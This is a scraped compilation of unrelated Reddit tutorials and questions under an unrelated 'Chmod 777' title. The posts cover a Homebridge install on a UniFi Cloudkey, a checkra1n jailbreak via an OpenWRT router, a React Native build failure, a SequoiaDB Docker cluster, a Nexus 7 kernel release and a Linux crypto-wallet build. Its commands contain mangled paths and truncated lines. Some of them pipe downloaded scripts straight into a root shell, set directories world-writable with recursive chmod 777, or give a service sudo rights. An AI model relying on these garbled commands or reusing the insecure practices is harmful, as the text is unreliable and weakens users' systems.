Chmod 777: A Definitive Guide To File Permissions

[Guide] Homebridge UniFi Cloudkey v1 (07/2020)

A small preface, after allot of trial&error i’m finally managed to install Homebridge + Config UI X on a UniFi Cloudkey V1. I have spend many hours testing to have Homebridge running correctly. First i followed a guide from Ro3lie’s and this was partly successful, but the NodeJS was version 10.x and the serviced (running Homebridge as a service...) was not working. First NodeJS 10.x is not ideal for some Homebridge plugins (needs NodeJS 12.x), also Homebridge was not running as a service so if you restart the Cloudkey or you have a network issue you have to manually start the service with ssh. I have used Putty for the SSH connection and WinSCP to change some files, because i have/had almost no knowledge from NodeJS, Coding skills, etc so i have used the combo of SSH and WinSCP.
This guide will install the following
Update Cloudkey Firmware and reset to factory defaults:
Uninstalling the UniFi Controller:
Changing the .list files:
Deb is used to indicate that we want to download indexes of binary packages , we also need to change and delete some files. For this part i used WinSCP (SFTP Client) but if you have some more skills you can also do it from your SSH connection. If you want to do it with SSH find the info in Ro3lie’s guide.
deb http://deb.debian.org/debian buster main contrib non-free deb-src http://deb.debian.org/debian buster main contrib non-free deb http://deb.debian.org/debian-security/ busteupdates main contrib non-free deb-src http://deb.debian.org/debian-security/ busteupdates main contrib non- deb http://deb.debian.org/debian buster-updates main contrib non-free deb-src http://deb.debian.org/debian buster-updates main contrib non-free
Go to /etc/apt/sources.list.d/ and you find 3 files here, delete security.list and ubnt-unifi.list. Change the name of nodejs.list to nodesource.list. Open the file and again delete all the text inside and paste the following and save the file:
deb https://deb.nodesource.com/node_12.x stretch main deb-src https://deb.nodesource.com/node_12.x stretch main
Now run the following commands (from SSH connection...) and after it’s done reboot the Cloudkey (run the command reboot from your ssh connection...)
sudo apt-get update sudo apt-get clean && sudo apt-get clean all && sudo apt-get autoclean && sudo apt-get update
Update Debian OS:
We first need to update to the newer Debian Buster 10.x, at this moment the Cloudkey is running Debian Jessie 8.x. Run command sudo apt-get update && sudo apt-get upgrade During the upgrade you may be asked what to do with the unattended-upgrades configration file, Choose to ‘Keep the local version currently installed’. When everything is done we need to delete some files we no longer use. Run the following commands:
rm /etc/apt/apt.conf.d/50unattended-upgrades.ucf-dist sudo apt-get remove freeradius sudo apt-get purge freeradius
Update NodeJS 6.x to 12.x:
sudo apt update sudo apt -y install curl dirmngr apt- transport-https lsb-release ca-certificatescurl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -sudo apt -y install nodejs
To test if you have successful installed NodeJS 12.x and NPM 6.x.x run the commands node -v and npm -v
Install Homebridge + Config UI X and setup Homebridge as a service:
sudo npm install -g —unsafe-perm homebridge homebridge- config-ui-x
sudo hb-service install —user homebridge
At this point all the availble files for Homebridge and the service are installed. Normally Homebridge will now be running as a service but for some reason it doesn’t’ so we have to do some changes to make everything work. Use WinSCP and navigate to the following file /etc/systemd/system/homebridge.service delete all available text and paste the following and save.
[Unit] Description=Node.js HomeKit Server After=syslog.target network-online.target [Service] Type=simple User=homebridge EnvironmentFile=/etc/default/homebridge

Adapt this to your specific setup (could be /usbin/homebridge) # See comments below for more information ExecStart=/usbin/homebridge $HOMEBRIDGE_OPTS

Restart=on-failure RestartSec=10 KillMode=process [Install] WantedBy=multi-user.target
Now do the same for /etc/default/homebridge, also delete the text and past the following
# Defaults / Configuration options for homebridge

The following settings tells homebridge where to find the config.json HOMEBRIDGE_OPTS=-U /valib/homebridge -I

If you uncomment the following line, homebridge will log more

You can display this via systemd's journalctl: journalctl -f -u homebridge # DEBUG=*

To enable web terminals via homebridge-config-ui-x uncomment the following li HOMEBRIDGE_CONFIG_UI_TERMINAL=1

We need to make some (user right changes and move the .service file to the valib folder, a few of this commands are not needed and will throw some errors, just ignore that and just run them all.)
sudo mkdir /valib/homebridge sudo useradd —s—tem homebridge sudo chown -R homebridge:homebridge /valib/homebridge sudo chmod 777 -R /valib/homebridge sudo cp .homebridge/config.json /valib/homebridge/config.json
Start Homebridge as a service (run the following commands):
systemctl daemon-reload systemctl enable homebridge systemctl start homebridge
Homebridge is now running as a service and you can login to the UI-X using your Cloudkey’s localipaddress:8581. If you have a backup from another system you can just restore it at this point, after the restore is done just don’t do anything and follow the next steps...
Homebridge SUDO rights using Visudo:
The last part is very important, we have to give the user Homebridge sudo rights. If you don’t do this last part correctly you can not update homebridge, install packages or use the log viewer in the UI-X because Homebridge don’t have the correct rights. We going to use VI, a safe and secure text editor.
Thats it! If you done everything correcly you have now a working Homebridge with UI-X running as a service on your UniFi Cloudkey! Note if someone reads this guide and think there are some changes needed please let me know. Special thanks to Ro3lie for his original guide and Jeroen Van Dijk for the great support with Visudo! You can find both original guides where i get inspired for this tutorial here and here.
submitted by AverageUser1337 to homebridge [link] [comments]

[Tutorial] Run Checkra1n on any OpenWRT & Checkra1n compatible router (not just Linksys)

*Don't try this on a main router because you could permanently brick the router. Read through this entire post before starting and only attempt this if you're familiar with Terminal and you know what you're doing.\*
If you saw this post but don't have a Linksys router, you might still be in luck.

Requirements

Procedure

  1. Search for your router on the OpenWRT website and open the page for your router. On the page, look for the "Installation" heading, and download the "Firmware OpenWRT Install" for your router model.
  2. Download the appropriate Checkra1n binary from the Checkra1n website.
  3. Connect your computer to your router via ethernet and power on the router. You need the router's IP address, if you don't know what it is, do the following. Visit that IP address in your browser, and if a web login is available, then you're good so far.
  4. Log in with your router username and password (if you've never changed the credentials, Google the default ones). After logging in, unplug any other cables from the router besides power and the ethernet cable connected to your computer. Look for a way to upload a custom firmware file, and upload the file you downloaded from OpenWRT. Upgrade to that firmware.
  5. Once that's done, visiting the router's IP (which is now 192.168.1.1) will take you to the OpenWRT login page. Log in with the username "root" and leave the password field blank.
    1. (Optional) If you would like, you can perform a software reset from within OpenWRT's webpage to prevent filesystem corruption. After you do that, log back into the router.
  6. Change the router's password. This is required for SSH access.
    1. (Optional) Enable wireless connections on your router from Network > Wireless. If you need help, check out this. If you do this, you won't need the Ethernet cable anymore.
  7. SSH into the router. (If you're on Windows, enable SSH connect). In CMD/Terminal, type ssh [email protected] When it asks for the password, use the router password.
  8. Look for any directories with at least 20MB free space. You can do this by typing the command df. The free directory will most likely be the /tmp Directory. (Please note that the /tmp directory is cleared every time the router turns on...) Once you find a directory, Type exit to close the SSH connection.
  9. You should be back on CMD/Terminal. Then, type this command to transfer the Checkra1n file to the router: scp PATH/TO/CHECKRA1N/FILE [email protected]:PATH/TO/FREE/DIRECTORY
  10. You're almost done, we need to adjust permissions now. SSH into the router again and type these commands: cd PATH/TO/FREE/DIRECTORY, chmod 777 checkra1n
  11. Connect your iDevice via USB Port, and put it in iTunes Recovery Mode. Then type ./checkra1n -c -v
  12. Put the device into DFU Mode, and hopefully it boots jailbroken (if you see errors then press CTRL+C to stop checkra1n, and type ./checkra1n -c -v again since reliability is bad)
If you do use the /tmp directory, repeat steps 9-12 every time you power on your router
submitted by WishingTie09120 to jailbreak [link] [comments]

Android build failed when using react native CLI - Resource linking failed: ZipArchive didn't find signature at start of LFH, Invalid APK offset

Hey friends, I've been trying to get my environment set up to develop React Native apps on my Linux machine but I couldn't figure out how to fix this error when I start to run it on my Android device/emulator.
I'm fairly new to React Native and this is my first time trying the React Native CLI instead of using Expo so any help would be very much appreciated.
It fails on Task :app:processDebugResources when 'installing the app' (after running npx react-native run-android), with error message
FAILURE: Build failed with an exception. * What went wrong: Execution failed for task ':app:processDebugResources'. > A failure occurred while executing com.android.build.gradle.internal.tasks.Workers$ActionFacade > Android resource linking failed AAPT: W/ziparchive(68779): Zip: didn't find signature at start of lfh, offset=33511520 error: failed to open APK: Invalid offset. * Try: Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights. * Get more help at https://help.gradle.org BUILD FAILED in 1s error Failed to install the app. Make sure you have the Android development environment set up: https://reactnative.dev/docs/getting-started.html#android-development-environment. Run CLI with --verbose flag for more details. Error: Command failed: ./gradlew app:installDebug -PreactNativeDevServerPort=8081 FAILURE: Build failed with an exception. * What went wrong: Execution failed for task ':app:processDebugResources'. > A failure occurred while executing com.android.build.gradle.internal.tasks.Workers$ActionFacade > Android resource linking failed AAPT: W/ziparchive(68779): Zip: didn't find signature at start of lfh, offset=33511520 error: failed to open APK: Invalid offset. * Try: Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights. * Get more help at https://help.gradle.org BUILD FAILED in 1s at makeError (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/execa/index.js:174:9) at /home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/execa/index.js:278:16 at processTicksAndRejections (internal/process/task_queues.js:97:5) at async runOnAllDevices (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/@react-native-community/cli-platform-android/build/commands/runAndroid/runOnAllDevices.js:94:5) at async Command.handleAction (/home/USERNAME-REDACTED/Desktop/AwesomeTSProject/node_modules/@react-native-community/cli/build/index.js:186:9) 
where the ziparchive(XXXXX) numbers change each time. Please let me know if further output would help (i.e. with stacktrace or info flags).
For context, I've been following the React Native CLI Quickstart guide for Linux as the development OS and Android as the target OS. The distribution I'm using is Manjaro Linux with KDE Plasma on a Dell XPS 13 9360. The issue starts at the "Running your React Native application" section when running npx react-native run-android after starting the metro bundler (npx react-native start).
I believe it has to do with my environment and not the code as I am using the starter template when initializing the project and it builds fine when I tested it on some cloud service (https://appcenter.ms/).
Here is my system information when I run npx react-native info:
System: OS: Linux 4.19 Manjaro Linux CPU: (8) x64 Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz Memory: 2.70 GB / 7.52 GB Shell: 5.0.16 - /bin/bash Binaries: Node: 13.8.0 - ~/.nvm/versions/node/v13.8.0/bin/node Yarn: 1.22.4 - /usbin/yarn npm: 6.13.6 - ~/.nvm/versions/node/v13.8.0/bin/npm Watchman: 4.9.0 - /usbin/watchman SDKs: Android SDK: Not Found IDEs: Android Studio: 3.6 AI-192.7142.36.36.6308749 Languages: Java: 1.8.0_242 - /usbin/javac Python: 3.8.2 - /usbin/python npmPackages: @react-native-community/cli: Not Found react: 16.11.0 => 16.11.0 react-native: 0.62.1 => 0.62.1 npmGlobalPackages: *react-native*: Not Found 
What worries me is that the above shows Android SDK: Not Found but I see Android SDK Platform 28 when I go to Settings > Android SDK in Android Studio and the corresponding folder exists in my Android home. Similarly for Intel x86 Atom_64 System Image also.
I went through https://github.com/facebook/react-native/issues/23306 and tried
but unfortunately none of that worked for me.
I also found two forum threads with seemingly identical errors, however, both of them were not resolved.
Interestingly, I found an article explain what the error may mean https://www.fortinet.com/blog/threat-research/an-android-package-is-no-longer-a-zip.html
My understanding from that is that an incompatible Gradle may be causing the issue.
My android/gradle/wrappergradle-wrapper.properties has distributionUrl=https\://services.gradle.org/distributions/gradle-6.0.1-all.zip and Android Studio's File > Project Structure > Project has Gradle Version to 6.0.1.
Any insights? Any and all help is very much appreciated. Thanks!
submitted by stinkboye to reactnative [link] [comments]

How to implement rapid deployment of SequoiaDB cluster with Docker

How to implement rapid deployment of SequoiaDB cluster with Docker

https://preview.redd.it/m2dvha7w78j21.png?width=1800&format=png&auto=webp&s=9818d227c07904ae01e6debc30bc4d55548f14bb
Container technology, represented by Docker and Rocket, is becoming more and more popular. It changes the way companies and users create, publish, and use distributed applications, and it will bring its value to the cloud computing industry in the next five years. The reasons for its attractiveness are as follows:

1)Resource Independence and Isolation

Resource isolation is the most basic requirement of cloud computing platforms. Docker limits the hardware resources and software running environment through the Linux namespace, cgroup, and is isolated from other applications on the host machine, so it does not affect each other.

Different applications and service are “ship” and “unship” with the unit of container. Thousands of “containers” are arranged on the “container” ship. Different companies, different types of “goods” (programs, components, operating environments, dependencies required to run applications) remain independent.

2) Environmental Consistency

The development engineer builds a docker image after finishing the application development. Based on this image, the container is packaged with various “parts of goods” (programs, components, operating environment, dependencies required to run the application). No matter where the container is: development environment, test environment or production environment, you can ensure that the number of “goods” in the container is exactly the same, the software package will not be missing in the test environment, and the environmental variables will not be forgotten in the production environment. The development and production environment will not cause the application to run abnormally due to the dependency of installing different versions. This consistency is benefited by the fact that the “build docker image” is already sealed into the “container” when delivery, and each link is transporting this complete “container” that does not need to be split and merged.

3) Lightweight

Compared to traditional virtualization technology (VM), the performance loss of using docker on cpu, memory, disk IO, network IO has the same level or even better performance. The rapid creation, start-up, and destruction of containers have received a lot of praise.

4)Build Once, Run Everywhere

This feature has attracted many people. When the “goods” (application) is exchanged between “cars”, “trains”, “ships” (private clouds, public clouds, etc.), it only need to migrate the “docker container” which conform to the standard specifications and handling mode, which has reduced the time-consuming and labor-intensive manual “loading and unloading” (online and off-line applications), resulting in huge time labor cost savings. This feature makes it possible for only a few operators in the future to operate the container clusters for ultra-large-scale loading online applications, just as a few machine operators in the 1960s can unload a 10,000-class container ship in a few hours.

Container technology nowadays is also widely used in the database field. Its “Build Once, Run Everywhere” feature greatly reduces the time spent on installing the configuration database environment. Because even for DBAs who have been working with databases for many years, installing the configuration database environment is still a seemingly simple but often a complex work. Of course, other advantages of container technology are also well used in the application of databases.

As an excellent domestic distributed NewSQL database, SequoiaDB has been recognized by more and more users. This article takes Docker as an example, focusing on how to quickly build a SequoiaDB image with Dockerfile, and how to use the container to quickly build and start the SequoiaDB cluster to application system.

Build SequoiaDB image

How to install docker and configure repositories is not the focus of this article. There are many related technical articles on the Internet. It should be pointed out that this article uses Aliyun Repository, because the speed of uploading images to Docker official repository is unflattering. How to register and use the Aliyun Repository can refer to the article (http://www.jb51.net/article/123101.htm).

STEP 1: Create Dockerfile using following simple statements:
# Sequoiadb DOCKERFILES PROJECT # -------------------------- # This is the Dockerfile for Sequoiadb 2.8.4 # # REQUIRED FILES TO BUILD THIS IMAGE # ---------------------------------- # (1) sequoiadb-2.8.4-linux_x86_64-enterprise-installer.run # (2) installSDB.sh # # HOW TO BUILD THIS IMAGE # ----------------------- # Put all downloaded files in the same directory as this Dockerfile # Run: # $ sudo docker build -t sequoiadb:2.8.4 . # # Pull base image FROM ubuntu # Environment variables required for this build ENV INSTALL_BIN_FILE="sequoiadb-2.8.4-linux_x86_64-enterprise-installer.run" \ INSTALL_SDB_SCRIPT="installSDB.sh" \ INSTALL_DIR="/opt/sequoiadb" # Copy binaries ADD $INSTALL_BIN_FILE $INSTALL_SDB_SCRIPT $INSTALL_DI # Install SDB software binaries RUN chmod 755 $INSTALL_DI$INSTALL_SDB_SCRIPT \ && $INSTALL_DI$INSTALL_SDB_SCRIPT \ && rm $INSTALL_DI$INSTALL_SDB_SCRIPT 
The content of the installSDB.sh script are as follows:
chmod 755 $INSTALL_DI$INSTALL_BIN_FILE $INSTALL_DI$INSTALL_BIN_FILE --mode unattended rm $INSTALL_DI$INSTALL_BIN_FILE echo 'service sdbcm start' >> /root/.bashrc 
It should to be noted that this example uses SequoiaDB Enterprise Edition 2.8.4. You can also download the community version from the official website of SequoiaDB (select tar package, download and extract), and replace the media name in this example. SequoiaDB website download address: http://download.sequoiadb.com/cn/

STEP 2: Create an image
The root user executes:
Docker build -tsequoiadb: 2.8.4 .If you are a normal user, use sudo:Sudo docker build -tsequoiadb: 2.8.4 .

STEP3: Login to Aliyun Repository
Docker login — username=xxxregistry.cn-hangzhou.aliyuncs.comWhere xxx is the account you registered with Alibaba Cloud.

STEP4: View local SequoiaDB image id
docker images

STEP5: Mark local image and put it into Aliyun Repository
04dc528f2a6f is the author’s local sequoiadb image id, registry.cn-hangzhou.aliyuncs.com is the Aliyun Repository address, 508mars is the author’s name in Aliyun, SequoiaDB is the image name, and latest is the tag.

Start SequoiaDB cluster with container

Docker’s network defaults to bridge mode, and containers in bridge mode have the following characteristics:
1) Containers in the same host can ping each other
2) Containers in different hosts can not ping each other

However, the SequoiaDB cluster requires interoperability between all nodes, so if the container with SequoiaDB is running on different hosts, the default network mode of docker is obviously inappropriate. There are many ways to solve the connectivity problem between different host containers. This article only introduces the weave virtual network solution, because weave also provides a DNS server function. When deploying SequoiaDB clusters with containers using this function, it is no longer necessary to modify /etc/hosts inside each container, which greatly simplifies the steps of automated deployment.

STEP1: Install the weave network
Curl -s -L git.io/weave -o /uslocal/bin/weave
Chmod a+x /uslocal/bin/weave
It needs to install on all hosts, the author uses three virtual machines as hosts: sdb1, sdb2 and sdb3.

STEP2: Start the weave network
Weave launch
The weave image will be downloaded the first time it is started.

STEP3: Download the SequoiaDB image from Aliyun Repository
Docker pull registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb

STEP4: Create a docker mounted volume on all hosts
Cd /home/sdbadmin
Mkdir -p data/disk1 data/disk2 data/disk3
Mkdir -p conf/local
Chmod -R 777 data
Chmod -R 777 conf
The location of the mounted volume can be customized, but in general, it needs to create two types of mounted volumes, one for storing aggregate data, such as data/disk1, data/disk2, data/disk3, and so on. The other is used to store node configuration information, such as conf/local in this example. Thus, even if the container is deleted by mistake, you can still start a new container to play the role of the container that was accidentally deleted.

STEP5: Start the container
sdb1: weave stop weave launch eval $(weave env) docker run -dit --name sdbserver1 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb sdb2: weave stop weave launch 192.168.17.132 eval $(weave env) docker run -dit --name sdbserver2 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb sdb3: weave stop weave launch 192.168.17.132 eval $(weave env) docker run -dit --name sdbserver3 -p 11810:11810 -v /home/sdbadmin/data:/data -v /home/sdbadmin/conf/local:/opt/sequoiadb/conf/local registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb 
192.168.17.132 is the IP address of sdb1 and 11810 is the externally exposed cluster access port. The volume on the host that stores the node configuration information must be hung in the /opt/sequoiadb/conf/local directory of the container. The volume that holds the table data can be mounted to the user-defined directory. However, once the cluster is created, it cannot be changed. The machine name must be specified when starting the container, because after the cluster is built, the machine name will be saved in the system table of SequoiaDB. If the machine name of the node is inconsistent with the system table, it will not be added to the cluster. In the scenario of using weave, it is recommended to use the--name option. Do not use--hostname to set the machine name. The latter will prevent weave from adding the machine name to the DNS server. Weave will automatically set the machine name according to the value of --name, and add the weave.local domain name after the machine name. Also, it will add it to the DNS server.

STEP6: Copy the script that created the SequoiaDB cluster to the container docker cp create_cluster.js sdbserver1:/data
The content of create_cluster.js is as follows:
var array_hosts = ["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]; var array_dbroot = ["/data/disk1/sequoiadb/database","/data/disk2/sequoiadb/database","/data/disk3/sequoiadb/database"]; var port_sdbcm = "11790"; var port_temp_coord = "18888"; var cataloggroup = {gname:"SYSCatalogGroup", gport:"11820", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]}; var array_coordgroups = [ {gname:"SYSCoord", gport:"11810", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"]} ]; var array_datagroups = [ {gname:"dg1", gport:"11830", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}} ,{gname:"dg2", gport:"11840", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}} ,{gname:"dg3", gport:"11850", ghosts:["sdbserver1.weave.local", "sdbserver2.weave.local", "sdbserver3.weave.local"], goptions:{transactionon:true}} ]; var array_domains = [ {dname:"allgroups", dgroups:["dg1", "dg2", "dg3"], doptions:{AutoSplit:true}} ]; println("启动临时协调节点"); var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm); oma.createCoord(port_temp_coord, array_dbroot[0]+"/coord/"+port_temp_coord); oma.startNode(port_temp_coord); println("创建编目节点组:"+cataloggroup.ghosts[0]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport); var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord); db.createCataRG(cataloggroup.ghosts[0], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport); var cataRG = db.getRG("SYSCatalogGroup"); for (var i in cataloggroup.ghosts) { if (i==0) {continue;} println("创建编目节点: "+cataloggroup.ghosts[i]+" "+cataloggroup.gport+" "+array_dbroot[0]+"/cata/"+cataloggroup.gport); var catanode = cataRG.createNode(cataloggroup.ghosts[i], cataloggroup.gport, array_dbroot[0]+"/cata/"+cataloggroup.gport); catanode.start(); } println("创建协调节点组"); var db = new Sdb(array_coordgroups[0].ghosts[0], port_temp_coord); var coordRG = db.createCoordRG(); for (var i in array_coordgroups) { for (var j in array_coordgroups[i].ghosts) { println("创建协调节点组:"+array_coordgroups[i].ghosts[j]+" "+array_coordgroups[i].gport+" "+array_dbroot[0]+"/coord/"+array_coordgroups[i].gport); coordRG.createNode(array_coordgroups[i].ghosts[j], array_coordgroups[i].gport, array_dbroot[0]+"/coord/"+array_coordgroups[i].gport); } } coordRG.start(); println("删除临时协调节点") var oma = new Oma(array_coordgroups[0].ghosts[0], port_sdbcm); oma.removeCoord(port_temp_coord); println("创建数据节点组") var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport); var k=0; for (var i in array_datagroups) { var dataRG = db.createRG(array_datagroups[i].gname); for (var j in array_datagroups[i].ghosts) { println("创建数据节点:"+array_datagroups[i].gname+" "+array_datagroups[i].ghosts[j]+" "+array_datagroups[i].gport+" "+array_dbroot[k]+"/data/"+array_datagroups[i].gport+" "+array_datagroups[i].goptions) dataRG.createNode(array_datagroups[i].ghosts[j], array_datagroups[i].gport, array_dbroot[k]+"/data/"+array_datagroups[i].gport, array_datagroups[i].goptions); } dataRG.start(); k++; } println("创建域"); var db = new Sdb(array_coordgroups[0].ghosts[0], array_coordgroups[0].gport); for (var i in array_domains) { println("创建域:"+array_domains[i].dname+" "+array_domains[i].dgroups+" "+array_domains[i].doptions) db.createDomain(array_domains[i].dname, array_domains[i].dgroups, array_domains[i].doptions ); } 
STEP7:创建SequoiaDB集群
docker exec sdbserver1 su - sdbadmin -c "sdb -f /data/create_cluster.js"

至此SequoiaDB集群创建并启动完成,后面再启动容器的时候集群会自动启动。

Conclusion

SequoiaDB uses container technology to achieve rapid cluster deployment, which greatly simplifies the installation and deployment of beginners. Later, the author will also do some optimization on SequoiaDB image production, because the image currently made is a bit large. The main reason is that using the ADD or COPY command to copy the CD-ROM toward the Docker container will generate a new image1, although the finally generated image2 has been deleted CD-ROM, it is above image1, and the size of image2 still contains the CD-ROM. Thus, it is best to use ADD command to copy tar package(ADD automatically decompress ) or use a method as follows:
RUN mkdir -p /ussrc/things \ && curl -SL http://example.com/big.tar.xz \ | tar -xJC /ussrc/things \ && make -C /ussrc/things all 
submitted by sequoiadb to u/sequoiadb [link] [comments]

v3 beta-R4 for Android 5.1.0 flo + deb

The new kernel release has been in test-mode for 14 days (April 27 - May 11). 14 users participated in testing. During this time, this thread was set to non-public mode. All comments, that have been exchanged, are attached below. To make most sense of this info, you want to read the comments bottom-up (chronological order). Start with "Initial release April 27 2015".
May 11, 2015 - Today I handed out install images to another 16 users and made this thread accessible to all users. Now 30 people in total are using this kernel on Android 5.1.0.
May 12, 2015 - Handed out 12 copies on request and 20 copies to old users and previous testers. 62 copies now delivered in total.
To request your kernel install images for 5.1.0, please send an email with subject "request v3 beta-R4". You will find the two install images within 24 hrs (or so) in your personal folder. Please report you findings below. Thank you.
Safety exception: in the first week (until May 18), I will NOT deliver the new kernel to very new users (who have joined April 10 or after). (removed May 13.)
May 14, 2015 - Uploaded installers for all "deb" users.
May 18, 2015 - Uploaded installers for all "flo" users.
May 22, 2015 - 180+ users have downloaded R4 build 61 since April 27 .
Installation procedure is same as it ever was: after installing the target 5.1.0 Android release via factory image ("LMY47O"), you install a custom recovery (TWRP) via fastboot/bootloader. For this, your bootloader needs to be unlocked. You will then be able to install three files via recovery:
This is all you need to do.
Before you start upgrading, you should make a full backup of your current system in recovery. I strongly suggest you create your backup onto an external USB flash drive. TWRP can do this and it can also quickly and reliably restore from such a backup image. Please make use of this.
The new features are listed below (under "build 57").
Releases:
v3 beta-R4 build 61:
v3 beta-R4 build 58:
v3 beta-R4 build 57:
Android 5.1.0 improvements over 5.0.x:
Easycap drivers - old and new:
You need to edit your userinit.sh file (once), to tell the system which Easycap drivers to load. This way you can switch between the old and the new drivers.
To create userinit.sh for the old (legacy), single-file easycap driver:
su echo "insmod /system/vendoeasycap.ko" > /data/local/userinit.sh chmod 777 /data/local/userinit.sh 
To create userinit.sh for the new easycap stk1160 driver:
su echo "insmod /system/vendostk1160.ko" > /data/local/userinit.sh chmod 777 /data/local/userinit.sh 
The new EasyCap drivers support faster device initialization (cold start). However, the new EasyCap stk1160 driver does NOT seem to work with all stk1160-based devices.
The Sabrent Easycap and USBTV Easycap devices do NOT appear to be working well with the new drivers made available via this kernel release. You should consider getting a STK1160 based frame grabber device to use with this release. See my USBTV related remarks.
The new EasyCap drivers are using a different video pixel encoding compared to the old/legacy driver. As a result, when using the new drivers, you need to change the default video encoding in VCam from YUYV to UYVY (once).
On first run, VCam will start up in PAL mode. If you are using a NTSC camera, you will need to switch VCam from PAL to NTSC (once).
Read: Automatic rear camera: 3 options
On-power CPU Governor:
This setting allows you to select different power saving modes (aka CPU underclocking).
The ability to switch CPU modes is a standard Linux kernel feature.
Here you can find more detailed CPU Governor info.
If you don't care for underclocking, just leave the default "interactive" setting selected. Most people may not need to change this ever.
I make this functionality available, because what looks like a reliable fixed power line to the tablet, may not be so very constant and reliable, if you are using your tablet in the car (or something similar). The assumption (of stock Android), that you want to run interactive mode, only because there is external power available, may be wrong.
I am myself using "ondemand" mode for now and I really don't feel much of difference. However, I assume the CPU's to run a little cooler overall. And I expect the 3D-navigation app, that I run for hours, to eat up less power overall, etc.
The "powersave" setting will not be of much interest to most people. It may be useful on some very hot days, I don't know. This is something some people may want to try. But probably not.
The Nexus 7 kernel does not support "conservative" mode. This may be a Snapdragon thing, I'm not sure. I know that other Android chipset's do support "conservative" mode also.
"Performance" is also not supported - at all. This setting only makes sense on servers. But I'm not even sure about this.
It's called "On power CPU Governor", because this setting only affects the CPU mode, when external power is attached. The battery driven mode is not influenced by this setting. On battery power, the tablet will behave 100% stock.
Btw, my desktop PC is practically always running in "ondemand" mode.
Previous v3 features
Users who are upgrading from v2.0/4.4.4 straight to v3/5.1.0 should at least take a brief look at the top messages of previous v3 releases: v3 beta-R1, v3 beta-R2 and v3 beta-R3.
submitted by timur-m to timurskernel [link] [comments]

Build your wallets on a flash drive with a live Linux OS

You will need to customize your build to suit your needs, but I picked wallets of the major currencies. For example I picked jaxx because it provides anonymous addresses for multiple currencies that can be used to move funds and accept funds with out giving personal details. I attempted to provide reliable source information but make no claims to the security of any of these applications. Be sure to research the tools used in your build. This is just a good frame work for building a portable wallet with "pretty good security". It provides a means to build portable wallets, hardware wallets, and back up your build to DVD for loss prevention with all of it, backups included being password protected and encrypted.
Install a debian type distribution to a flash drive. 8GB will work, but 32GB or 64GB will provide some additional space to work with. These instructions will work for Debian, Ubuntu, Mint, or any other related distribution.
The installation instructions are easy to follow, but during the installation phase. I would recommend configuring grub to install to the flash drive rather than the main drive of the computer during the creation of the partitions. Also, encrypt your home folder to prevent casual browsing of the files with some other operating system.
Detailed instructions for your version of linux can be found easily by searching for"install linux version to flash drive."
Install Debian
Install Mint
Install Ubuntu
Applications and app images can be installed to your home folder and those contents will be protected from observation if the drive is lost.

Your system can also be protected from loss with Pinguy Builder.

If you are careful about what is installed it is easy to build a wallet that will fit on a DVD. Keep the fat down to a minimum and a backup can be built with Pinguy Builder.
Pinguy Builder is currently hosted in Sourceforge website. Head over to the following URL and download the latest Pinguy Builder version.
Download Pinguy Builder
First install Gdebi package. Gdebi will take care of all necessary dependencies while installing a software.
$ sudo apt-get install gdebi
Go to the download location, and then install Pinguy Builder as shown below.
$ sudo gdebi pinguybuilder_4.3-6_all-beta.deb

CryptoCurrency Linux Build

Install wget

$ sudo apt-get install wget

Install GDBI Package Manager

$ sudo apt-get install -gdebi
$ sudo dpkg -i FileName.deb
$ sudo apt-get install -f

Install github fuse (Runs github AppImages)

$ sudo apt-get install fuse
$ sudo modprobe fuse
$ sudo groupadd fuse
user="$(whoami)"
sudo usermod -a -G fuse $user

Install Curl

$ sudo apt-get install curl

Install Browsers

Remove Firefox / Thunderbird

$ sudo apt remove firefox
$ sudo apt remove thunderbird

Add Chromium Browser

Chromium is a good choice because it supports the tor, jaxx, metamask, and ledger nano extensions. This makes the wallets and apps easily supported between devices and operating systems.
$Chromium sudo apt install -y chromium-browser
If you need Flash, run the following command. $ sudo apt install -y pepperflashplugin-nonfree
$ sudo update-pepperflashplugin-nonfree --install
I typically configure chromium to open in incognito mode by editing the application entry in .
You have to change one line in the chromium-browser.desktop file. The best is to do that locally:
Copy the file from /usshare/applications to /home/yourname/.local/share/applications
Open the file with gedit (open gedit and drag the local desktop file on to the gedit window)
Find the first line in the file that begins with Exec=
Replace the line by Exec=chromium-browser --incognito

Brave

An additional browser may be helpful for non- crypto related browsing. I currently like the Brave browser or the tor browser.
For AMD64: $ wget -O brave.deb https://laptop-updates.brave.com/latest/dev/ubuntu64
$ sudo dpkg -i ./brave.deb
$ sudo apt-get install -f

Install TOR

$ sudo apt install tor Start Service
$ sudo /etc/init.d/tor start
Verify Service
$ ps aux|grep tor
$ systemctl status tor
Start TOR Service on Boot
$ sudo update-rc.d tor enable

Tor Browser

$ sudo add-apt-repository ppa:webupd8team/tor-browser
$ sudo apt-get update
$ sudo apt-get install tor-browser

Install hashrat

Install hashrat / standardnotes Install hashrat to verify checksums.
$ sudo apt-get install hashrat
Use man page for details
$ man hashrat
Verify the check sums of all software when downloaded from reputable sources with hashrat. See the man file for syntax with the following command.

Communications Programs

